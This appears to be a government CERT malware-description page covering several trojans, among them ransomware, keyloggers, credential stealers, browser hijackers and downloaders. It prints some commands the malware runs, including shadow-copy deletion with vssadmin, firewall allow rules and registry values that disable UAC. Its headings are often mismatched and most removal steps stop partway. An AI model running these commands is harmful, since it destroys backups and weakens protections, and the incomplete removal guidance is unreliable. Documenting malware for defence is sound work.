SPECIAL STATE PROTECTION SERVICE
SPECIAL COMMUNICATION AND INFORMATION
SECURITY STATE AGENCY

COMPUTER EMERGENCY
RESPONSE CENTER

Report Incident

Malware

  • Technical Details:

     The program code of the malware is usually embedded in HTML pages.

    It is written in JavaScript .

    The trojan may redirect the user to the attacker's web sites.

  • Remove:

     1. Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

  • Technical Details:

     The trojan quits immediately if it detects a running process containing one of the following strings in its name:
    avp.exe
    The trojan can download and execute a file from the Internet.

    The trojan can terminate the following processes:
    cmd.exe
    msconfig.exe
    taskmgr.exe
    WerFault.exe
    more info
    The trojan may execute the following commands:
    %windir%­System32­vssadmin.exe delete shadows /all /Quiet
    The following file is dropped:
    %desktop%­!%variable_id%.bmp
    This file/image is set as a wallpaper.

  • Installation:

     The trojan creates copies of the following files (source, destination):
    %windir%­system32­rundll32.exe, %malwarefolder%­rundll32.exe
    %windir%­SysWOW64­rundll32.exe, %malwarefolder%­rundll32.exe
    The trojan launches the following processes:
    %malwarefolder%­rundll32.exe %malwarefolder%­%malwarefilename%,MXS0
    %malwarefolder%­rundll32.exe %malwarefolder%­%malwarefilename%,MXS1
    %malwarefolder%­rundll32.exe %malwarefolder%­%malwarefilename%,MXS2
    %malwarefolder%­rundll32.exe %malwarefolder%­%malwarefilename%,MXS4
    The trojan may create the text file:
    %commonappdata%­Z
    The trojan creates the following file:
    %startup%­!%variable_id%.lnk
    A string with variable content is used instead of %variable_id% .

    The file is a shortcut to a malicious file.

    The trojan keeps various information in the following files:
    %commonappdata%­!%variable_id%.key
    The trojan creates the following files:
    %commonappdata%­!%variable_id%.html
    %commonappdata%­!%variable_id%.bmp
    %nethood%­!%variable_id%.bmp

  • Spreading method:

     The trojan collects the following information:
    operating system version
    The trojan contains a list of (2) IP addresses.

    It tries to connect to the remote machine on port:
    443
    The trojan attempts to send gathered information to a remote machine.

  • Thread:

     Win32/Filecoder.CryptProjectXXX.E is a trojan that encrypts files on fixed, removable and network drives.

    The trojan searches for files with the following file extensions:
    .3DM
    .3DS
    .3G2
    .3GP
    .4DB
    .4DL
    .4MP
    .7Z
    .A3D
    .ABM
    .ABS
    .ABW
    .ACC
    .DB
    .ACT
    .GR
    .ADN
    .ADP
    .AES
    .Da
    .AF2
    .AF3
    .AFT
    .AFX
    .AGIF
    .AGP
    .AHD
    .AI
    .AIC
    .AIF
    .AIM
    .ALBM
    .ALF
    .ANI
    .ANS
    .APD
    .APK
    .APM
    .APNG
    .APP
    .APS
    .APT
    .APX
    .ARC
    .ART
    .ARW
    .ASC
    .ASE
    .ASF
    .ASK
    .ASM
    .ASP
    .ASPX
    .ASW
    .ASX
    .ASY
    .ATY
    .AVI
    .AWDB
    .AWP
    .AWT
    .AWW
    .AZZ
    .BAD
    .BAY
    .BBS
    .BDB
    .BDP
    .BDR
    .BEAN
    .BIB
    .BM2
    .BMP
    .BMX
    .BNA
    .BND
    .BOC
    .BOK
    .BRD
    .BRK
    .BRN
    .BRT
    .BSS
    .BTD
    .BTI
    .BTR
    .BZ2
    .C
    .C2
    .C4
    .C4D
    .CAL
    .CALS
    .CAN
    .CD5
    .CDB
    .CDC
    .CDG
    .CDMM
    .CDMT
    .CDR
    .CDR3
    .CDR4
    .CDR6
    .CDT
    .CER
    .CF
    .CFG
    .CFM
    .CFU
    .CGI
    .CGM
    .CIMG
    .CIN
    .CIT
    .CKP
    .CLASS
    .CLKW
    .CMA
    .CMD
    .CMX
    .CNM
    .CNV
    .COLZ
    .CPC
    .CPD
    .CPG
    .CPP
    .CPS
    .CPT
    .CPX
    .CRD
    .CRT
    .CRWL
    .CRYPT
    .CS
    .CSR
    .CSS
    .CSV
    .CSY
    .CUE
    .CV5
    .CVG
    .CVI
    .CVS
    .CVX
    .CWT
    .CXF
    .CYI
    .DAD
    .DAF
    .DB
    .DB3
    .DBF
    .DBK
    .DBT
    .DBV
    .DBX
    .DCA
    .DCB
    .DCH
    .DCS
    .DCT
    .DCU
    .DCX
    .DDL
    .DDOC
    .DDS
    .DED
    .DF1
    .DG
    .DGN
    .DGS
    .DHS
    .DIB
    .DIF
    .DIP
    .DIZ
    .DJV
    .DJVU
    .DM3
    .DMI
    .DMO
    .DNC
    .DNE
    .DOC
    .DOCB
    .DOCM
    .DOCX
    .DOCZ
    .DOT
    .DOTM
    .DOTX
    .DP1
    .DPP
    .DPX
    .DQY
    .DRW
    .DRZ
    .DSK
    .DSN
    .DSV
    .DT
    .DT2
    .DTA
    .DTD
    .DTSX
    .DTW
    .DVI
    .DVL
    .DWG
    .DX
    .DXB
    .DXF
    .DXL
    .ECO
    .ECW
    .ECX
    .EDB
    .EFD
    .EGC
    .EIO
    .EIP
    .EIT
    .EMD
    .EMF
    .EML
    .EMLX
    .EP
    .EPF
    .EPP
    .EPS
    .EPSF
    .EQL
    .ERF
    .ERR
    .ETF
    .ETX
    .EUC
    .EXR
    .FAL
    .FAQ
    .FAX
    .FB2
    .FB3
    .FBL
    .FBX
    .FCD
    .FCF
    .FDB
    .FDF
    .FDR
    .FDS
    .FDT
    .FDX
    .FDXT
    .FES
    .FFT
    .FH10
    .FH11
    .FH3
    .FH4
    .FH5
    .FH6
    .FH7
    .FH8
    .FIC
    .FID
    .FIF
    .FIG
    .FIL
    .FL
    .FLA
    .FLI
    .FLR
    .FLV
    .FM5
    .FMV
    .FODT
    .FOL
    .FP3
    .FP4
    .FP5
    .FP7
    .FPOS
    .FPT
    .FPX
    .FRM
    .FRT
    .FT10
    .FT11
    .FT7
    .FT8
    .FT9
    .FTN
    .FWDN
    .FXC
    .FXG
    .FZB
    .FZV
    .GADGET
    .GBK
    .GBR
    .GCDP
    .GDB
    .GDOC
    .GED
    .GEM
    .GEO
    .GFB
    .GGR
    .GIF
    .GIH
    .GIM
    .GIO
    .GLOX
    .GPD
    .GPG
    .GPN
    .GPX
    .GRO
    .GROB
    .GRS
    .GSD
    .GTHR
    .GTP
    .GV
    .GWI
    .GZ
    .H
    .HBK
    .HDB
    .HDP
    .HDR
    .HHT
    .HIS
    .HPG
    .HPGL
    .HPI
    .HPL
    .HS
    .HTC
    .HTM
    .HTML
    .HWP
    .HZ
    .I3D
    .IB
    .IBD
    .IBOOKS
    .ICN
    .ICON
    .IDC
    .IDEA
    .IDX
    .IFF
    .IGT
    .IGX
    .IHX
    .IIL
    .IIQ
    .IMD
    .INDD
    .INFO
    .INK
    .IPF
    .IPX
    .ITDB
    .ITW
    .IWI
    .J2C
    .J2K
    .JAR
    .JAS
    .JAVA
    .JB2
    .JBMP
    .JBR
    .JFIF
    .JIA
    .JIS
    .JKS
    .JNG
    .JOE
    .JP1
    .JP2
    .JPE
    .JPEG
    .JPG
    .JPG2
    .JPS
    .JPX
    .JRTF
    .JS
    .JSP
    .JTX
    .JWL
    .JXR
    .KDB
    .KDBX
    .KDC
    .KDI
    .KDK
    .KES
    .KEY
    .KIC
    .KLG
    .KML
    .KMZ
    .KNT
    .KON
    .KPG
    .KWD
    .LAY
    .LAY6
    .LBM
    .LBT
    .LDF
    .LGC
    .LIS
    .LIT
    .LJP
    .LMK
    .LNT
    .LP2
    .LRC
    .LST
    .LTR
    .LTX
    .LUA
    .LUE
    .LUF
    .LWO
    .LWP
    .LWS
    .LYT
    .LYX
    .M
    .M3D
    .M3U
    .M4A
    .M4V
    .MA
    .MAC
    .MAN
    .MAP
    .MAQ
    .MAT
    .MAX
    .MB
    .MBM
    .MBOX
    .MDB
    .MDF
    .MDN
    .MDT
    .ME
    .MEF
    .MELL
    .MFD
    .MFT
    .MGCB
    .MGMT
    .MGMX
    .MID
    .MIN
    .MKV
    .MMAT
    .MML
    .MNG
    .MNR
    .MNT
    .MOBI
    .MOS
    .MOV
    .MP3
    .MP4
    .MPA
    .MPF
    .MPG
    .MPO
    .MRG
    .MRXS
    .MS11
    .MSG
    .MSI
    .MT9
    .MUD
    .MWB
    .MWP
    .MXL
    .MYD
    .MYI
    .MYL
    .NCR
    .NCT
    .NDF
    .NEF
    .NFO
    .NJX
    .NLM
    .NOTE
    .NOW
    .NRW
    .NS2
    .NS3
    .NS4
    .NSF
    .NV2
    .NYF
    .NZB
    .OBJ
    .OC3
    .OC4
    .OC5
    .OCE
    .OCI
    .OCR
    .ODB
    .ODG
    .ODM
    .ODO
    .ODP
    .ODS
    .ODT
    .OFL
    .OFT
    .OMF
    .OPLC
    .OQY
    .ORA
    .ORF
    .ORT
    .ORX
    .OTA
    .OTG
    .OTI
    .OTP
    .OTS
    .OTT
    .OVP
    .OVR
    .OWC
    .OWG
    .OYX
    .OZB
    .OZJ
    .OZT
    .P12
    .P7S
    .P96
    .P97
    .PAGES
    .PAL
    .PAN
    .PANO
    .PAP
    .PAQ
    .PAS
    .PB
    .PBM
    .PC1
    .RDDS
    .RDL
    .RFT
    .RGB
    .RGF
    .RIB
    .RIC
    .RIFF
    .RIS
    .RIX
    .RLE
    .RLI
    .RM
    .RNG
    .RPD
    .RPF
    .RPT
    .RRI
    .RSB
    .RSD
    .RSR
    .RSS
    .RST
    .RT
    .RTD
    .RTF
    .RTX
    .RUN
    .RW2
    .RWL
    .RZK
    .RZN
    .S2MV
    .S3M
    .SAF
    .SAI
    .SAM
    .SAVE
    .SBF
    .SCAD
    .SCC
    .SCH
    .SCI
    .SCM
    .SCT
    .SCV
    .SCW
    .SDB
    .SDF
    .SDM
    .SDOC
    .SDW
    .SEP
    .SFC
    .SFW
    .SGM
    .SH
    .SIG
    .SITX
    .SK1
    .SK2
    .SKM
    .SLA
    .SLD
    .SLDX
    .SLK
    .SLN
    .SLS
    .SMF
    .SMIL
    .SMS
    .SOB
    .SPA
    .SPE
    .SPH
    .SPJ
    .SPP
    .SPQ
    .SPR
    .SQB
    .SQL
    .SQLITE3
    .SQLITEDB
    .SR2
    .SRT
    .SRW
    .SSA
    .SSK
    .ST
    .STC
    .STD
    .STE
    .STI
    .STM
    .STN
    .STP
    .STR
    .STW
    .STY
    .SUB
    .SUMO
    .SVA
    .SVF
    .SVG
    .SVGZ
    .SWF
    .SXC
    .SXD
    .SXG
    .SXI
    .SXM
    .SXW
    .T2B
    .TAB
    .TAR
    .TB0
    .TBK
    .TBN
    .TCX
    .TDF
    .TDT
    .TE
    .TEX
    .TEXT
    .TF
    .TFC
    .TG4
    .TGA
    .TGZ
    .THM
    .THP
    .TIF
    .TIFF
    .TJP
    .TLB
    .TLC
    .TM
    .TM2
    .TMD
    .TMP
    .TMV
    .TMX
    .TN
    .TNE
    .TPC
    .TPI
    .TRM
    .TVJ
    .TXT
    .U3D
    .U3I
    .UDB
    .UFO
    .UFR
    .UGA
    .UNX
    .UOF
    .UOP
    .UOT
    .UPD
    .USR
    .UTF8
    .UTXT
    .V12
    .VB
    .VBR
    .VBS
    .VCF
    .VCT
    .VCXPROJ
    .VDA
    .VDB
    .VDI
    .VEC
    .VFF
    .VMDK
    .VML
    .VMX
    .VNT
    .VOB
    .VPD
    .VPE
    .VRML
    .VRP
    .VSD
    .VSDM
    .VSDX
    .VSM
    .VST
    .VSTX
    .VUE
    .VW
    .WAV
    .WB1
    .WBC
    .WBD
    .WBK
    .WBM
    .WBMP
    .WBZ
    .WCF
    .WDB
    .WDP
    .WEBP
    .WGZ
    .WIRE
    .WKS
    .WMA
    .WMDB
    .WMF
    .WMV
    .WN
    .WP
    .WP4
    .WP5
    .WP6
    .WP7
    .WPA
    .WPD
    .WPE
    .WPG
    .WPL
    .WPS
    .WPT
    .WPW
    .WRI
    .WSC
    .WSD
    .WSF
    .WSH
    .WTX
    .WVL
    .X3D
    .X3F
    .XAR
    .XCODEPROJ
    .XDB
    .XDL
    .XHTM
    .XHTML
    .XLC
    .XLD
    .XLF
    .XLGC
    .XLM
    .XLR
    .XLS
    .XLSB
    .XLSM
    .XLSX
    .XLT
    .XLTM
    .XLTX
    .XLW
    .XML
    .XPM
    .XPS
    .XWP
    .XY3
    .XYP
    .XYW
    .YAL
    .YBK
    .YML
    .YSP
    .YUV
    .Z3D
    .ZABW
    .ZDB
    .ZDC
    .ZIF
    .ZIP
    .ZIPX
    .ZW
    more info
    It avoids files which contain any of the following strings in their path:
    ­ALLUSE~1­
    ­APPDATA­
    ­APPLIC~1­
    ­COOKIES­
    ­F4BC~1­
    ­LOCALS~1­
    ­PROGRA~1­
    ­PROGRA~2­
    ­PROGRA~3­
    ­PUBLIC­
    ­TEMPLA~1­
    AUTOEXEC.BAT
    THUMBS.DB
    %variable_id%

    It avoids those with any of the following strings in their names:
    !
    It avoids files with the following extensions:
    .CRYPT
    The trojan encrypts the file content.

    The RSA, RC4 encryption algorithm is used.

    An additional .cryp1 extension is appended.

    The following files are dropped:
    %currentfolder%­!%variable_id%.html
    %currentfolder%­!%variable_id%.txt
    %startup%­!%variable_id%B.lnk
    %startup%­!%variable_id%H.lnk
    %desktop%­!%variable_id%.bmp
    %desktop%­!%variable_id%.html
    %desktop%­!%variable_id%.txt

    To decrypt files the user is requested to comply with given conditions in exchange for a password/instructions.

    When files encryption is finished, the trojan removes itself from the computer.

  • Technical Details:

     MSIL/Agent.OJF is a trojan that redirects results of online search engines to specific web sites.

    The following programs are affected:
    Internet Explorer
    Mozilla Firefox
    Trojan requires the
    Microsoft .NET Framework
    to run.

  • Installation:

     The trojan does not create any copies of itself.

    The trojan creates the following files:
    %appdata%\­Mozilla\­Firefox\­Profiles\­%defaultprofile%\­searchplugins\­google.xml (2079 B)
    %programfiles%\­Mozilla Firefox\­searchplugins\­google.xml (2079 B)
    The trojan modifies the following file:
    %appdata%\­Mozilla\­Firefox\­Profiles\­%defaultprofile%\­prefs.js
    The following Registry entries are set:
    [HKEY_LOCAL_MACHINE\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Policies\­System]
    "EnableLUA" = "0"
    [HKEY_LOCAL_MACHINE\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Policies\­System]
    "ConsentPromptBehaviorAdmin" = "0"
    [HKEY_CURRENT_USER\­SOFTWARE\­Microsoft\­Internet Explorer\­SearchScopes]
    "DefaultScope" = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
    [HKEY_CURRENT_USER\­SOFTWARE\­Microsoft\­Internet Explorer\­SearchScopes\­{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
    "(Default)" = "Live Search"
    "DisplayName" = "@ieframe.dll,-12512"
    "URL" = "http://www.google.com/cse?cx=partner-pub%censored%"
    "SuggestionsURLFallback" = "http://www.google.com/cse?cx=partner-pub%censored%"
    [HKEY_CURRENT_USER\­SOFTWARE\­Microsoft\­Internet Explorer\­SearchUrl\­g]
    "(Default)" = "http://www.google.com/cse?cx=partner-pub-%censored%"
    more info

  • Remove:

     1. Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

  • Technical Details:

     The trojan collects the following information:
    operating system version
    information about the operating system and system settings
    language settings
    computer IP address
    The trojan is able to log keystrokes.

    The trojan attempts to send gathered information to a remote machine.

    The trojan contains a URL address. The HTTP protocol is used.

  • Installation:

     The trojan does not create any copies of itself.

    The following Registry entry is set:
    [HKEY_LOCAL_MACHINE­SOFTWARE­Microsoft­Windows NT­CurrentVersion]
    "RegId" = %variable%
    A variable numerical value is used instead of %variable% .

  • Spreading method:

     The trojan keeps various information in the following files:
    %appdata%­adobesystem.log
    %appdata%­adobe­system.log
    %appdata%­ntuser.dat

  • Technical Details:

     The trojan may delete the following files:
    %desktop%\­*Chrome*.lnk
    %desktop%\­*Chrome*.lnk
    %desktop%\­*Google*.lnk
    %desktop%\­*Google*.lnk
    %desktop%\­*Internet*.lnk
    %desktop%\­*Internet*.lnk
    %desktop%\­*Explorer*.lnk
    %desktop%\­*Explorer*.lnk
    The trojan may delete the following folders:
    C:\­Documents and Settings\­%username%\­Application Data\­Mozilla\­Firefox\­Profiles\­%profile%\­extensions
    C:\­Documents and Settings\­%username%\­AppData\­Roaming\­Mozilla\­Firefox\­Profiles\­%profile%\­extension
    The trojan can terminate the following processes:
    chrome.exe
    firefox.exe
    browser.exe

  • Installation:

     The trojan does not create any copies of itself.

    The trojan creates the following files:
    %appdata%\­Mozila\­ver.dat (3 B)
    %desktop%\­Google Chrome.lnk
    %desktop%\­Internet Explorer.lnk
    The following Registry entries are set:
    [HKEY_CURRENT_USER\­Software\­Google\­Update\­ClientState\­{8A69D345-D564-463C-AFF1-A69D9E530F96}]
    "ap" = "2.0-dev-multi-chrome"
    [HKEY_CURRENT_USER\­Software\­Google\­Update\­ClientState\­{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]

  • Thread:

     The trojan installs browser extensions for the following browsers:
    Google Chrome
    Mozilla Firefox

  • Technical Details:
  • Installation:

     When executed, the trojan copies itself into the following location:
    %appdata%\­nJFKrvSGxB\­uArVzWJr.exe
    The following files are dropped:
    %temp%\­RarSFX%variable1%\­JBchppI.exe (45056 B, MSIL/Injector.OJN)
    %temp%\­RARSFX%variable1%\­srVzWJrYnjUO.bin (503169 B)
    %temp%\­%variable2%
    A string with variable content is used instead of %variable1-2% .

    The trojan creates the following file:
    %startup%\­YDDYNXdLBf.lnk
    The file is a shortcut to a malicious file.

    This causes the trojan to be executed on every system start.

    The trojan creates copies of the following files (source, destination):
    %windir%\­Microsoft.NET\­Framework\­v2.0.50727\­Cvtres.exe, %appdata%\­Microsoft\­log\­securityscan.exe
    The following Registry entries are set:
    [HKEY_LOCAL_MACHINE\­Software\­Microsoft\­Windows\­CurrentVersion\­Policies\­Explorer]
    "TaskbarNoNotification" = 1
    [HKEY_LOCAL_MACHINE\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Policies\­System]

    The trojan launches the following processes:
    %windir%\­Microsoft.NET\­Framework\­v2.0.50727\­Cvtres.exe
    The trojan creates and runs a new thread with its own code within these running processes.

    The trojan terminates its execution if it detects that it's running in a specific virtual environment.

    The trojan quits immediately if it detects a running process containing one of the following strings in its name:
    VboxService.exe
    VMwaretray.exe
    vpc.exe

  • Spreading method:

     The trojan collects the following information:
    login user names for certain applications/services
    login passwords for certain applications/services
    logged keystrokes
    screenshots
    user name
    computer name
    external IP address of the network device
    network adapter information
    CPU information
    memory status
    BIOS version
    installed antivirus software
    default Internet browser
    operating system version
    language settings
    The following programs are affected:
    Google Chrome
    Mozilla Firefox
    Filezilla
    The following services are affected:
    No-IP
    The collected information is stored in the following files:
    %appdata%\­Microsoft\­log\­passwords.txt
    %appdata%\­Microsoft\­log\­logs_%variable%.htm
    A string with variable content is used instead of %variable% .

    The trojan sends the information via e-mail. The SMTP protocol is used.

  • Technical Details:

     The trojan acquires data and commands from a remote computer or the Internet.

    The TCP, HTTP protocol is used in the communication.

    It can execute the following operations:
    download files from a remote computer and/or the Internet
    run executable files
    The malware configuration is passed as command line parameters when the malware executable is launched.

  • Installation:

     The trojan does not create any copies of itself.

  • Remove:

    1. Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking. 

  • Technical Details:

     The trojan is a malicious Google Chrome extension/plugin.

    The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a URL address. The HTTP protocol is used in the communication.

    It can execute the following operations:
    modify the content of websites
    block access to specific websites
    The trojan may redirect the user to the specific web sites.

    The trojan blocks access to any domains that contain any of the following strings in their name:
    2-viruses.com
    aavar.org
    adwarereport.com

  • Installation:

     The trojan does not create any copies of itself.

  • Spreading method:

     The trojan collects the following information:
    URLs visited
    The trojan attempts to send gathered information to a remote machine.

  • Technical Details:

     The trojan is a malicious Google Chrome extension/plugin.

    The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a URL address. The HTTP protocol is used in the communication.

    It can execute the following operations:
    modify the content of websites
    block access to specific websites
    The trojan may redirect the user to the specific web sites.

    The trojan blocks access to any domains that contain any of the following strings in their name:
    2-viruses.com
    aavar.org
    adwarereport.com

  • Installation:

     The trojan does not create any copies of itself.

  • Spreading method:

     The trojan collects the following information:
    URLs visited
    The trojan attempts to send gathered information to a remote machine.

  • Remove:

     1. Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

  • Technical Details:

     The trojan contains a list of (11) URLs.

    It tries to download several files from the addresses.

    The files are saved into the following folder:
    %appdata%\­Mozila\­
    The files are then executed. The HTTP protocol is used.

  • Installation:

     The trojan does not create any copies of itself.

  • Technical Details:

     The trojan serves as a proxy server.

    It can execute the following operations:
    open ports
    connect to remote computers to a specific port
    The TCP protocol is used.

  • Installation:

     The trojan does not create any copies of itself.

  • Remove:

     Start computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On Recovery interface, click on 'See advanced repair options'.
    c) Next, click on Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, please choose Windows Startup Settings and click on Restart. When Windows restarts, you will be send to a familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

  • Technical Details:

    The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a list of (6) URLs. The HTTP, UDP protocol is used in the communication.

    The trojan sends HTTP requests to simulate clicks on banner advertisements, to inflate web counter statistics etc.

    The trojan keeps various information in the following files:
    %appdata%\­u00BD\­u009E\­u0092\­u0093\­u00D3\­u0099\­u009C\­u0089
    %commonappdata%\­@system3.att
    %commonappdata%\­@000001.dat

  • Installation:

     The trojan collects the following information:
    country code
    operating system version
    The trojan attempts to send gathered information to a remote machine. The UDP protocol is used.

  • Spreading method:

      When executed, the trojan copies itself into the following location:
    %appdata%\­BrowserMe\­ChromeUpdate.exe
    In order to be executed on every system start, the trojan sets the following Registry entry:
    [HKEY_CURRENT_USER\­Software\­Microsoft\­Windows\­CurrentVersion\­Run]
    "BrowserMe" = "%appdata%\­BrowserMe\­ChromeUpdate.exe"
    The trojan launches the following processes:
    %windir%\­system32\­svchost.exe -k netsvcs
    %windir%\­SysWOW64\­svchost.exe -k netsvcs
    %programfiles%\­Internet Explorer\­iexplore.exe
    %programfiles%\­Google\­Chrome\­Application\­chrome.exe

    The trojan creates and runs a new thread with its own code within these running processes.
    The trojan creates the following files:
    %appdata%\­u00BD\­u009E\­u0092\­u0093\­u00D3\­u0099\­u009C\­u0089 (480 B)
    %commonappdata%\­@system3.att (656 B)
    The trojan may create the following files:
    %localappdata%\­Google\­Chrome\­local.dat
    %localappdata%\­Google\­Chrome\­clocal.dat
    %localappdata%\­Google\­Chrome\­Plug\­background.html (68 B)
    %localappdata%\­Google\­Chrome\­Plug\­background.js (204 B)
    %localappdata%\­Google\­Chrome\­Plug\­contentscript.js (23580 B)
    %localappdata%\­Google\­Chrome\­Plug\­fix.css (207 B)
    %localappdata%\­Google\­Chrome\­Plug\­icon-128.png (18489 B)
    %localappdata%\­Google\­Chrome\­Plug\­manifest.json (478 B)

    The trojan may set the following Registry entries:
    [HKEY_CURRENT_USER\­Software\­Microsoft\­Internet Explorer\­Main]
    "DisableFirstRunCustomize" = 1
    "Play_Background_Sounds" = "no"
    The trojan terminates its execution if it detects that it's running in a specific virtual environment.

  • Technical Details:

     The trojan collects the following information:
    user name
    computer IP address
    screenshots
    The trojan is able to log keystrokes.

    The collected information is stored in the following file:
    %appdata%\­87

  • Installation:

     When executed, the trojan copies itself into the following location:
    %startup%\­Sirewa__.cpl
    This causes the trojan to be executed on every system start.

    The trojan copies itself to the following locations:
    %appdata%\­Sirewa__.cpl
    %systemdrive%\­WINDOWS\­system32\­Sirewa__.cpl
    The trojan creates and runs a new thread with its own program code within the following processes:
    firefox.exe
    iexplore.exe
    chrome.exe
    opera.exe
    navigator.exe
    safari.exe
    maxthon.exe
    The following files are modified:
    %startup%\­Mozilla Firefox.lnk
    %startup%\­Internet Explorer.lnk
    %startup%\­Google Chrome.lnk

  • Spreading method:

     The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a URL address. The HTTP protocol is used.

    It can execute the following operations:
    update itself to a newer version
    send gathered information

  • Remove:

     1. Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

  • Technical Details:

     The trojan collects the following information:
    operating system version
    information about the operating system and system settings
    installed program components under [HKEY_LOCAL_MACHINE\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Uninstall] Registry subkeys
    amount of operating memory
    CPU information
    cookies
    opened port number
    the path to specific folders
    more info
    The trojan attempts to send gathered information to a remote machine.

    The trojan contains a URL address. The HTTP protocol is used.

  • Installation:

     The trojan does not create any copies of itself.

  • Technical Details:
  • Installation:

     When executed, the trojan copies itself into the following location:
    %programfiles%\­FastWeb\­fastweb.exe
    The trojan creates the following file:
    %programfiles%\­FastWeb\­config_ns1.dat (12 B)
    In order to be executed on every system start, the trojan sets the following Registry entry:
    [HKEY_CURRENT_USER\­Software\­Microsoft\­Windows\­CurrentVersion\­Run]
    "fastweb" = "%programfiles%\­FastWeb\­fastweb.exe"

  • Thread:

     The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a list of (6) URLs. The TCP protocol is used in the communication.

    The trojan serves as a proxy server.

    The trojan checks for Internet connectivity by trying to connect to the following addresses:
    duckduckgo.com

  • Technical Details:

     The trojan contains a list of (4) URLs.

    It tries to download a file from the addresses.

    The file is stored in the following location:
    %temp%\­%variable%t.exe
    The file is then executed. The HTTP, FTP protocol is used.

    A string with variable content is used instead of %variable% .

  • Installation:

     The trojan does not create any copies of itself.

  • Remove:

     1. Remove all media such as floppy drive, cd, dvd, and USB devices. Then, restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 system
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.
    Start computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On Recovery interface, click on 'See advanced repair options'.
    c) Next, click on Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, please choose Windows Startup Settings and click on Restart. When Windows restarts, you will be send to a familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

  • Technical Details:
  • Installation:

     When executed, the trojan creates one of the following files:
    %windir%\­CRMSvc.exe (269312 B, MSIL/Agent.QXU)
    %programfiles%\­CRMSvc\­CRMSvc.exe (269312 B, MSIL/Agent.QXU)
    The trojan registers file as a system service.

    This causes the trojan to be executed on every system start.

    The following Registry entries are set:
    [HKEY_LOCAL_MACHINE\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Uninstall\­{D105DFE2-8DF6-4BA0-ABF1-392716658963}]
    "DisplayName" = "CRMSvc"
    "DisplayVersion" = "1.5.45.468"
    "EstimatedSize" = 278
    "InstallDate" = "%variable1%"
    "InstallLocation" = "%installfolder%"
    "NoModify" = 1
    "NoRepair" = 1
    "Publisher" = "CRM Ltd"
    "QuietUninstallString" = "%installfolder%\­CRMSvc.exe --uninst"
    "UninstallString" = "%installfolder%\­CRMSvc.exe --uninst"
    [HKEY_LOCAL_MACHINE\­SOFTWARE\­CRMSvc]
    "uid" = "%variable2%"
    A string with variable content is used instead of %variable1-2% .

  • Spreading method:

     The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a list of (3) URLs. The TCP, HTTP protocol is used in the communication.

    It can execute the following operations:
    download files from a remote computer and/or the Internet
    run executable files
    update itself to a newer version
    set up a proxy server
    send gathered information

    The trojan may execute the following commands:
    cmd.exe /C netsh firewall delete allowedprogram "%installfolder%\­CRMSvc.exe"
    cmd.exe /C netsh firewall add allowedprogram "%installfolder%\­CRMSvc.exe" CRMSvc ENABLE
    cmd.exe /C netsh advfirewall firewall delete rule name="CRMSvc"
    cmd.exe /C netsh advfirewall firewall add rule name="CRMSvc" dir=in action=allow program="%installfolder%\­CRMSvc.exe" enable=yes"
    sc.exe failure "CRMSvc" reset=2 actions=restart/10000

    Trojan requires the Microsoft .NET Framework to run.

  • Technical Details:

     Trojan:Win32/Dynamer!ac is a deadly computer Trojan that spreads via other malware or fake software update. It may deceive computer users and pretend as a required file when visiting requested web pages. Once executed, Trojan:Win32/Dynamer!ac carry out other harmful actions on the computer without user’s knowledge. Operation of this Trojan is so discreet that even installed anti-virus program may not sense.

    Once Trojan:Win32/Dynamer!ac infects a computer; it will make changes to the system. It also adds registry values and entries that are essential to its function. The threat can alter Internet browser settings causing a browser redirect in which visitor’s will receive page they did not request. Usually, redirect script is in the form of Java Script that is integrated into the browser so that it executes when user starts to surf the web.

    Detection of Trojan:Win32/Dynamer!ac may cover a large group of malicious programs or harmful scripts that shares matching payload. Purpose of this Trojan is to exploit a weakness in the system in order to redirect victims to predefined sites, which host other threats. Other variants of Trojan:Win32/Dynamer!ac is known to be utilized in distribution of malware and rogue programs.

    To remove Trojan:Win32/Dynamer!ac effectively, you must complete the removal steps outlined on this page. It is important that you scan the computer with anti-virus and anti-malware tool.

  • Remove:

